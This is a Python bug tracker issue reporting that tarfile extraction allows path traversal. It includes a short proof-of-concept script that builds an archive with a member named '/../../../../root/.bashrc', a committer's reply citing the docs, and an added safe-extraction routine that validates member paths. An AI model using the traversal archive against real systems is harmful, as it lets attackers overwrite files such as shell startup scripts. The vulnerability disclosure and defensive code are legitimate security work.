
Title: tarfile missing cross-directory checking
Type: security
Stage: resolved
Components: Library (Lib)
Versions: Python 3.8
Status: closed
Resolution: duplicate
Dependencies: (none)
Superseder: issue 21109 (tarfile: Traversal attack vulnerability)
Assigned To: (none)
Nosy List: eric.smith, martin.panter, xiongpanju
Priority: normal
Keywords: (none)

Created on 2021-09-11 07:45 by xiongpanju, last changed 2022-04-11 14:59 by admin. This issue is now closed.

Messages (3)
msg401631 - Author: daji ma (xiongpanju) Date: 2021-09-11 07:45
tarfile is missing cross-directory checking, like ../ or ..\; this potentially causes cross-directory decompression.
the exp:
# -*- coding: utf-8 -*-
import tarfile

def extract_tar(file_path, dest_path):
    try:
        with tarfile.open(file_path, 'r') as src_file:
            # every member is extracted as-is; member names are never checked
            # for absolute paths or '..' components before extraction
            for info in src_file.getmembers():
                src_file.extract(info, dest_path)
        return True
    except (IOError, OSError, tarfile.TarError):
        return False

def make_tar():
    # assumes a local file named 'bashrc'; it is stored under a traversing archive name
    tar_file = tarfile.open('x.tar.gz', 'w:gz')
    tar_file.add('bashrc', '/../../../../root/.bashrc')
    tar_file.close()

if __name__ == '__main__':
    extract_tar('x.tar.gz', 'xx')
msg401643 - Author: Eric V. Smith (eric.smith) * (Python committer) Date: 2021-09-11 17:05
This is documented in the tarfile docs:

Never extract archives from untrusted sources without prior inspection. It is possible that files are created outside of path, e.g. members that have absolute filenames starting with "/" or filenames with two dots "..".
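The "prior inspection" the docs call for, as an added example that is not part of this issue or of the tarfile module: each member's resolved destination (and, for links, the link target) is checked against the extraction root before anything is written, and the archives used to exercise it are constructed in memory. All function names here are hypothetical.

```python
import io
import os
import tarfile
import tempfile

def is_within(directory, target):
    directory, target = os.path.abspath(directory), os.path.abspath(target)
    return os.path.commonpath([directory, target]) == directory

def check_member(member, dest_path):
    """Return a reason string if `member` would land outside `dest_path`, else None."""
    target = os.path.join(dest_path, member.name)
    if os.path.isabs(member.name) or not is_within(dest_path, target):
        return "path escapes destination: %r" % member.name
    if member.issym() or member.islnk():
        # symlink targets resolve from the link's directory, hard links from the root
        base = os.path.dirname(target) if member.issym() else dest_path
        if not is_within(dest_path, os.path.join(base, member.linkname)):
            return "link target escapes destination: %r" % member.name
    return None

def safe_extract(file_obj, dest_path):
    """Inspect every member before extracting anything; returns extracted names."""
    with tarfile.open(fileobj=file_obj, mode="r:*") as tar:
        members = tar.getmembers()
        for m in members:
            problem = check_member(m, dest_path)
            if problem:
                raise ValueError(problem)
        tar.extractall(dest_path, members=members)
    return [m.name for m in members]

def build_archive(entries):
    """Constructed sample input: in-memory tar of (name, bytes) entries."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data in entries:
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    buf.seek(0)
    return buf

def demo():
    """(names extracted from a benign archive, error raised for a traversal archive)."""
    with tempfile.TemporaryDirectory() as dest:
        good = safe_extract(build_archive([("docs/readme.txt", b"hello")]), dest)
        try:
            safe_extract(build_archive([("../escaped.txt", b"x")]), dest)
            bad = None
        except ValueError as e:
            bad = str(e)
    return good, bad
```

From Python 3.12 on, `extractall(..., filter='data')` performs equivalent checks inside tarfile itself; on 3.8, the release this issue is filed against, the inspection has to be done by the caller as above.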
msg402194 - Author: Martin Panter (martin.panter) * (Python committer) Date: 2021-09-20 06:34
Issue 21109 has been open for a while and is the same as this, if I am not mistaken.
History
Date | User | Action | Args
2022-04-11 14:59:49 | admin | set | github: 89333
2021-09-20 06:34:12 | martin.panter | set | status: open -> closed; superseder: tarfile: Traversal attack vulnerability; nosy: + martin.panter; messages: + msg402194; resolution: duplicate; stage: resolved
2021-09-11 17:05:24 | eric.smith | set | nosy: + eric.smith; messages: + msg401643
2021-09-11 07:45:41 | xiongpanju | create |